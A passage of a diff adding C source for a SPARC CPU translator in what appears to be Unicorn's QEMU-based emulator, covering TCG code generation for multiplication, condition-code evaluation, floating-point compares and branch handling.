tcg_gen_xor_tl(tcg_ctx, t0, t0, r_temp); + tcg_temp_free(tcg_ctx, r_temp); + + // T0 = (b1 << 31) | (T0 >> 1); + // src1 = T0; + tcg_gen_shli_tl(tcg_ctx, t0, t0, 31); + tcg_gen_shri_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, *(TCGv *)tcg_ctx->cpu_cc_src, 1); + tcg_gen_or_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_src, *(TCGv *)tcg_ctx->cpu_cc_src, t0); + tcg_temp_free(tcg_ctx, t0); + + tcg_gen_add_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, *(TCGv *)tcg_ctx->cpu_cc_src, *(TCGv *)tcg_ctx->cpu_cc_src2); + + tcg_gen_mov_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_cc_dst); +} + +static inline void gen_op_multiply(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2, int sign_ext) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; +#if TARGET_LONG_BITS == 32 + if (sign_ext) { + tcg_gen_muls2_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_y, src1, src2); + } else { + tcg_gen_mulu2_tl(tcg_ctx, dst, *(TCGv *)tcg_ctx->cpu_y, src1, src2); + } +#else + TCGv t0 = tcg_temp_new_i64(tcg_ctx); + TCGv t1 = tcg_temp_new_i64(tcg_ctx); + + if (sign_ext) { + tcg_gen_ext32s_i64(tcg_ctx, t0, src1); + tcg_gen_ext32s_i64(tcg_ctx, t1, src2); + } else { + tcg_gen_ext32u_i64(tcg_ctx, t0, src1); + tcg_gen_ext32u_i64(tcg_ctx, t1, src2); + } + + tcg_gen_mul_i64(tcg_ctx, dst, t0, t1); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + + tcg_gen_shri_i64(tcg_ctx, *(TCGv *)tcg_ctx->cpu_y, dst, 32); +#endif +} + +static inline void gen_op_umul(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2) +{ + /* zero-extend truncated operands before multiplication */ + gen_op_multiply(dc, dst, src1, src2, 0); +} + +static inline void gen_op_smul(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2) +{ + /* sign-extend truncated operands before multiplication */ + gen_op_multiply(dc, dst, src1, src2, 1); +} + +// 1 +static inline void gen_op_eval_ba(DisasContext *dc, TCGv dst) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_movi_tl(tcg_ctx, dst, 1); +} + +// Z +static inline void gen_op_eval_be(DisasContext *dc, TCGv dst, TCGv_i32 
src) +{ + gen_mov_reg_Z(dc, dst, src); +} + +// Z | (N ^ V) +static inline void gen_op_eval_ble(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_N(dc, t0, src); + gen_mov_reg_V(dc, dst, src); + tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); + gen_mov_reg_Z(dc, t0, src); + tcg_gen_or_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// N ^ V +static inline void gen_op_eval_bl(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_V(dc, t0, src); + gen_mov_reg_N(dc, dst, src); + tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// C | Z +static inline void gen_op_eval_bleu(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_Z(dc, t0, src); + gen_mov_reg_C(dc, dst, src); + tcg_gen_or_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// C +static inline void gen_op_eval_bcs(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + gen_mov_reg_C(dc, dst, src); +} + +// V +static inline void gen_op_eval_bvs(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + gen_mov_reg_V(dc, dst, src); +} + +// 0 +static inline void gen_op_eval_bn(DisasContext *dc, TCGv dst) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_movi_tl(tcg_ctx, dst, 0); +} + +// N +static inline void gen_op_eval_bneg(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + gen_mov_reg_N(dc, dst, src); +} + +// !Z +static inline void gen_op_eval_bne(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_Z(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !(Z | (N ^ V)) +static inline void gen_op_eval_bg(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_eval_ble(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !(N ^ V) 
+static inline void gen_op_eval_bge(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_eval_bl(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !(C | Z) +static inline void gen_op_eval_bgu(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_op_eval_bleu(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !C +static inline void gen_op_eval_bcc(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_C(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !N +static inline void gen_op_eval_bpos(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_N(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !V +static inline void gen_op_eval_bvc(DisasContext *dc, TCGv dst, TCGv_i32 src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_V(dc, dst, src); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +/* + FPSR bit field FCC1 | FCC0: + 0 = + 1 < + 2 > + 3 unordered +*/ +static inline void gen_mov_reg_FCC0(DisasContext *dc, TCGv reg, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_shri_tl(tcg_ctx, reg, src, FSR_FCC0_SHIFT + fcc_offset); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +static inline void gen_mov_reg_FCC1(DisasContext *dc, TCGv reg, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_shri_tl(tcg_ctx, reg, src, FSR_FCC1_SHIFT + fcc_offset); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); +} + +// !0: FCC0 | FCC1 +static inline void gen_op_eval_fbne(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_or_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); 
+} + +// 1 or 2: FCC0 ^ FCC1 +static inline void gen_op_eval_fblg(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// 1 or 3: FCC0 +static inline void gen_op_eval_fbul(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); +} + +// 1: FCC0 & !FCC1 +static inline void gen_op_eval_fbl(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_andc_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// 2 or 3: FCC1 +static inline void gen_op_eval_fbug(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + gen_mov_reg_FCC1(dc, dst, src, fcc_offset); +} + +// 2: !FCC0 & FCC1 +static inline void gen_op_eval_fbg(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_andc_tl(tcg_ctx, dst, t0, dst); + tcg_temp_free(tcg_ctx, t0); +} + +// 3: FCC0 & FCC1 +static inline void gen_op_eval_fbu(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_and_tl(tcg_ctx, dst, dst, t0); + tcg_temp_free(tcg_ctx, t0); +} + +// 0: !(FCC0 | FCC1) +static inline void gen_op_eval_fbe(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv 
t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_or_tl(tcg_ctx, dst, dst, t0); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); + tcg_temp_free(tcg_ctx, t0); +} + +// 0 or 3: !(FCC0 ^ FCC1) +static inline void gen_op_eval_fbue(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); + tcg_temp_free(tcg_ctx, t0); +} + +// 0 or 2: !FCC0 +static inline void gen_op_eval_fbge(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !1: !(FCC0 & !FCC1) +static inline void gen_op_eval_fbuge(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_andc_tl(tcg_ctx, dst, dst, t0); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); + tcg_temp_free(tcg_ctx, t0); +} + +// 0 or 1: !FCC1 +static inline void gen_op_eval_fble(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + gen_mov_reg_FCC1(dc, dst, src, fcc_offset); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); +} + +// !2: !(!FCC0 & FCC1) +static inline void gen_op_eval_fbule(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_andc_tl(tcg_ctx, dst, t0, dst); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); + tcg_temp_free(tcg_ctx, t0); 
+} + +// !3: !(FCC0 & FCC1) +static inline void gen_op_eval_fbo(DisasContext *dc, TCGv dst, TCGv src, + unsigned int fcc_offset) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + gen_mov_reg_FCC0(dc, dst, src, fcc_offset); + gen_mov_reg_FCC1(dc, t0, src, fcc_offset); + tcg_gen_and_tl(tcg_ctx, dst, dst, t0); + tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); + tcg_temp_free(tcg_ctx, t0); +} + +static inline void gen_branch2(DisasContext *dc, target_ulong pc1, + target_ulong pc2, TCGv r_cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + int l1; + + l1 = gen_new_label(tcg_ctx); + + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, r_cond, 0, l1); + + gen_goto_tb(dc, 0, pc1, pc1 + 4); + + gen_set_label(tcg_ctx, l1); + gen_goto_tb(dc, 1, pc2, pc2 + 4); +} + +static inline void gen_branch_a(DisasContext *dc, target_ulong pc1, + target_ulong pc2, TCGv r_cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + int l1; + + l1 = gen_new_label(tcg_ctx); + + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, r_cond, 0, l1); + + gen_goto_tb(dc, 0, pc2, pc1); + + gen_set_label(tcg_ctx, l1); + gen_goto_tb(dc, 1, pc2 + 4, pc2 + 8); +} + +static inline void gen_generic_branch(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + TCGv npc0 = tcg_const_tl(tcg_ctx, dc->jump_pc[0]); + TCGv npc1 = tcg_const_tl(tcg_ctx, dc->jump_pc[1]); + TCGv zero = tcg_const_tl(tcg_ctx, 0); + + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, *(TCGv *)tcg_ctx->cpu_npc, *(TCGv *)tcg_ctx->cpu_cond, zero, npc0, npc1); + + tcg_temp_free(tcg_ctx, npc0); + tcg_temp_free(tcg_ctx, npc1); + tcg_temp_free(tcg_ctx, zero); +} + +/* call this function before using the condition register as it may + have been set for a jump */ +static inline void flush_cond(DisasContext *dc) +{ + if (dc->npc == JUMP_PC) { + gen_generic_branch(dc); + dc->npc = DYNAMIC_PC; + } +} + +static inline void save_npc(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (dc->npc == JUMP_PC) { + gen_generic_branch(dc); + 
dc->npc = DYNAMIC_PC; + } else if (dc->npc != DYNAMIC_PC) { + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, dc->npc); + } +} + +static inline void update_psr(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (dc->cc_op != CC_OP_FLAGS) { + dc->cc_op = CC_OP_FLAGS; + gen_helper_compute_psr(tcg_ctx, tcg_ctx->cpu_env); + } +} + +static inline void save_state(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, dc->pc); + save_npc(dc); +} + +static inline void gen_mov_pc_npc(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + if (dc->npc == JUMP_PC) { + gen_generic_branch(dc); + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc); + dc->pc = DYNAMIC_PC; + } else if (dc->npc == DYNAMIC_PC) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc); + dc->pc = DYNAMIC_PC; + } else { + dc->pc = dc->npc; + } +} + +static inline void gen_op_next_insn(DisasContext *dc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc); + tcg_gen_addi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_npc, *(TCGv *)tcg_ctx->cpu_npc, 4); +} + +static void free_compare(TCGContext *tcg_ctx, DisasCompare *cmp) +{ + if (!cmp->g1) { + tcg_temp_free(tcg_ctx, cmp->c1); + } + if (!cmp->g2) { + tcg_temp_free(tcg_ctx, cmp->c2); + } +} + +static void gen_compare(DisasContext *dc, DisasCompare *cmp, bool xcc, unsigned int cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + static int subcc_cond[16] = { + TCG_COND_NEVER, + TCG_COND_EQ, + TCG_COND_LE, + TCG_COND_LT, + TCG_COND_LEU, + TCG_COND_LTU, + -1, /* neg */ + -1, /* overflow */ + TCG_COND_ALWAYS, + TCG_COND_NE, + TCG_COND_GT, + TCG_COND_GE, + TCG_COND_GTU, + TCG_COND_GEU, + -1, /* pos */ + -1, /* no overflow */ + }; + + static int logic_cond[16] = { + TCG_COND_NEVER, + TCG_COND_EQ, /* eq: Z */ + TCG_COND_LE, /* le: Z | (N ^ V) -> Z 
| N */ + TCG_COND_LT, /* lt: N ^ V -> N */ + TCG_COND_EQ, /* leu: C | Z -> Z */ + TCG_COND_NEVER, /* ltu: C -> 0 */ + TCG_COND_LT, /* neg: N */ + TCG_COND_NEVER, /* vs: V -> 0 */ + TCG_COND_ALWAYS, + TCG_COND_NE, /* ne: !Z */ + TCG_COND_GT, /* gt: !(Z | (N ^ V)) -> !(Z | N) */ + TCG_COND_GE, /* ge: !(N ^ V) -> !N */ + TCG_COND_NE, /* gtu: !(C | Z) -> !Z */ + TCG_COND_ALWAYS, /* geu: !C -> 1 */ + TCG_COND_GE, /* pos: !N */ + TCG_COND_ALWAYS, /* vc: !V -> 1 */ + }; + + TCGv_i32 r_src; + TCGv r_dst; + +#ifdef TARGET_SPARC64 + if (xcc) { + r_src = tcg_ctx->cpu_xcc; + } else { + r_src = tcg_ctx->cpu_psr; + } +#else + r_src = tcg_ctx->cpu_psr; +#endif + + switch (dc->cc_op) { + case CC_OP_LOGIC: + cmp->cond = logic_cond[cond]; + do_compare_dst_0: + cmp->is_bool = false; + cmp->g2 = false; + cmp->c2 = tcg_const_tl(tcg_ctx, 0); +#ifdef TARGET_SPARC64 + if (!xcc) { + cmp->g1 = false; + cmp->c1 = tcg_temp_new(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, cmp->c1, *(TCGv *)tcg_ctx->cpu_cc_dst); + break; + } +#endif + cmp->g1 = true; + cmp->c1 = *(TCGv *)tcg_ctx->cpu_cc_dst; + break; + + case CC_OP_SUB: + switch (cond) { + case 6: /* neg */ + case 14: /* pos */ + cmp->cond = (cond == 6 ? TCG_COND_LT : TCG_COND_GE); + goto do_compare_dst_0; + + case 7: /* overflow */ + case 15: /* !overflow */ + goto do_dynamic; + + default: + cmp->cond = subcc_cond[cond]; + cmp->is_bool = false; +#ifdef TARGET_SPARC64 + if (!xcc) { + /* Note that sign-extension works for unsigned compares as + long as both operands are sign-extended. 
*/ + cmp->g1 = cmp->g2 = false; + cmp->c1 = tcg_temp_new(tcg_ctx); + cmp->c2 = tcg_temp_new(tcg_ctx); + tcg_gen_ext32s_tl(tcg_ctx, cmp->c1, *(TCGv *)tcg_ctx->cpu_cc_src); + tcg_gen_ext32s_tl(tcg_ctx, cmp->c2, *(TCGv *)tcg_ctx->cpu_cc_src2); + break; + } +#endif + cmp->g1 = cmp->g2 = true; + cmp->c1 = *(TCGv *)tcg_ctx->cpu_cc_src; + cmp->c2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + break; + } + break; + + default: + do_dynamic: + gen_helper_compute_psr(tcg_ctx, tcg_ctx->cpu_env); + dc->cc_op = CC_OP_FLAGS; + /* FALLTHRU */ + + case CC_OP_FLAGS: + /* We're going to generate a boolean result. */ + cmp->cond = TCG_COND_NE; + cmp->is_bool = true; + cmp->g1 = cmp->g2 = false; + cmp->c1 = r_dst = tcg_temp_new(tcg_ctx); + cmp->c2 = tcg_const_tl(tcg_ctx, 0); + + switch (cond) { + case 0x0: + gen_op_eval_bn(dc, r_dst); + break; + case 0x1: + gen_op_eval_be(dc, r_dst, r_src); + break; + case 0x2: + gen_op_eval_ble(dc, r_dst, r_src); + break; + case 0x3: + gen_op_eval_bl(dc, r_dst, r_src); + break; + case 0x4: + gen_op_eval_bleu(dc, r_dst, r_src); + break; + case 0x5: + gen_op_eval_bcs(dc, r_dst, r_src); + break; + case 0x6: + gen_op_eval_bneg(dc, r_dst, r_src); + break; + case 0x7: + gen_op_eval_bvs(dc, r_dst, r_src); + break; + case 0x8: + gen_op_eval_ba(dc, r_dst); + break; + case 0x9: + gen_op_eval_bne(dc, r_dst, r_src); + break; + case 0xa: + gen_op_eval_bg(dc, r_dst, r_src); + break; + case 0xb: + gen_op_eval_bge(dc, r_dst, r_src); + break; + case 0xc: + gen_op_eval_bgu(dc, r_dst, r_src); + break; + case 0xd: + gen_op_eval_bcc(dc, r_dst, r_src); + break; + case 0xe: + gen_op_eval_bpos(dc, r_dst, r_src); + break; + case 0xf: + gen_op_eval_bvc(dc, r_dst, r_src); + break; + } + break; + } +} + +static void gen_fcompare(DisasContext *dc, DisasCompare *cmp, unsigned int cc, unsigned int cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + unsigned int offset; + TCGv r_dst; + + /* For now we still generate a straight boolean result. 
*/ + cmp->cond = TCG_COND_NE; + cmp->is_bool = true; + cmp->g1 = cmp->g2 = false; + cmp->c1 = r_dst = tcg_temp_new(tcg_ctx); + cmp->c2 = tcg_const_tl(tcg_ctx, 0); + + switch (cc) { + default: + case 0x0: + offset = 0; + break; + case 0x1: + offset = 32 - 10; + break; + case 0x2: + offset = 34 - 10; + break; + case 0x3: + offset = 36 - 10; + break; + } + + switch (cond) { + case 0x0: + gen_op_eval_bn(dc, r_dst); + break; + case 0x1: + gen_op_eval_fbne(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x2: + gen_op_eval_fblg(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x3: + gen_op_eval_fbul(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x4: + gen_op_eval_fbl(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x5: + gen_op_eval_fbug(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x6: + gen_op_eval_fbg(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x7: + gen_op_eval_fbu(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0x8: + gen_op_eval_ba(dc, r_dst); + break; + case 0x9: + gen_op_eval_fbe(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xa: + gen_op_eval_fbue(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xb: + gen_op_eval_fbge(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xc: + gen_op_eval_fbuge(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xd: + gen_op_eval_fble(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xe: + gen_op_eval_fbule(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + case 0xf: + gen_op_eval_fbo(dc, r_dst, *(TCGv *)tcg_ctx->cpu_fsr, offset); + break; + } +} + +static void gen_cond(DisasContext *dc, TCGv r_dst, unsigned int cc, unsigned int cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + DisasCompare cmp; + gen_compare(dc, &cmp, cc, cond); + + /* The interface is to return a boolean in r_dst. 
*/ + if (cmp.is_bool) { + tcg_gen_mov_tl(tcg_ctx, r_dst, cmp.c1); + } else { + tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); + } + + free_compare(tcg_ctx, &cmp); +} + +static void gen_fcond(DisasContext *dc, TCGv r_dst, unsigned int cc, unsigned int cond) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + DisasCompare cmp; + gen_fcompare(dc, &cmp, cc, cond); + + /* The interface is to return a boolean in r_dst. */ + if (cmp.is_bool) { + tcg_gen_mov_tl(tcg_ctx, r_dst, cmp.c1); + } else { + tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); + } + + free_compare(tcg_ctx, &cmp); +} + +#ifdef TARGET_SPARC64 +// Inverted logic +static const int gen_tcg_cond_reg[8] = { + -1, + TCG_COND_NE, + TCG_COND_GT, + TCG_COND_GE, + -1, + TCG_COND_EQ, + TCG_COND_LE, + TCG_COND_LT, +}; + +static void gen_compare_reg(DisasContext *dc, DisasCompare *cmp, int cond, TCGv r_src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + cmp->cond = tcg_invert_cond(gen_tcg_cond_reg[cond]); + cmp->is_bool = false; + cmp->g1 = true; + cmp->g2 = false; + cmp->c1 = r_src; + cmp->c2 = tcg_const_tl(tcg_ctx, 0); +} + +static inline void gen_cond_reg(DisasContext *dc, TCGv r_dst, int cond, TCGv r_src) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + DisasCompare cmp; + gen_compare_reg(dc, &cmp, cond, r_src); + + /* The interface is to return a boolean in r_dst. 
*/ + tcg_gen_setcond_tl(tcg_ctx, cmp.cond, r_dst, cmp.c1, cmp.c2); + + free_compare(tcg_ctx, &cmp); +} +#endif + +static void do_branch(DisasContext *dc, int32_t offset, uint32_t insn, int cc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + unsigned int cond = GET_FIELD(insn, 3, 6), a = (insn & (1 << 29)); + target_ulong target = dc->pc + offset; + +#ifdef TARGET_SPARC64 + if (unlikely(AM_CHECK(dc))) { + target &= 0xffffffffULL; + } +#endif + if (cond == 0x0) { + /* unconditional not taken */ + if (a) { + dc->pc = dc->npc + 4; + dc->npc = dc->pc + 4; + } else { + dc->pc = dc->npc; + dc->npc = dc->pc + 4; + } + } else if (cond == 0x8) { + /* unconditional taken */ + if (a) { + dc->pc = target; + dc->npc = dc->pc + 4; + } else { + dc->pc = dc->npc; + dc->npc = target; + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc); + } + } else { + flush_cond(dc); + gen_cond(dc, *(TCGv *)tcg_ctx->cpu_cond, cc, cond); + if (a) { + gen_branch_a(dc, target, dc->npc, *(TCGv *)tcg_ctx->cpu_cond); + dc->is_br = 1; + } else { + dc->pc = dc->npc; + dc->jump_pc[0] = target; + if (unlikely(dc->npc == DYNAMIC_PC)) { + dc->jump_pc[1] = DYNAMIC_PC; + tcg_gen_addi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, *(TCGv *)tcg_ctx->cpu_npc, 4); + } else { + dc->jump_pc[1] = dc->npc + 4; + dc->npc = JUMP_PC; + } + } + } +} + +static void do_fbranch(DisasContext *dc, int32_t offset, uint32_t insn, int cc) +{ + TCGContext *tcg_ctx = dc->uc->tcg_ctx; + unsigned int cond = GET_FIELD(insn, 3, 6), a = (insn & (1 << 29)); + target_ulong target = dc->pc + offset; + +#ifdef TARGET_SPARC64 + if (unlikely(AM_CHECK(dc))) { + target &= 0xffffffffULL; + } +#endif + if (cond == 0x0) { + /* unconditional not taken */ + if (a) { + dc->pc = dc->npc + 4; + dc->npc = dc->pc + 4; + } else { + dc->pc = dc->npc; + dc->npc = dc->pc + 4; + } + } else if (cond == 0x8) { + /* unconditional taken */ + if (a) { + dc->pc = target; + dc->npc = dc->pc + 4; + } else { + dc->pc = dc->npc; + dc->npc = 
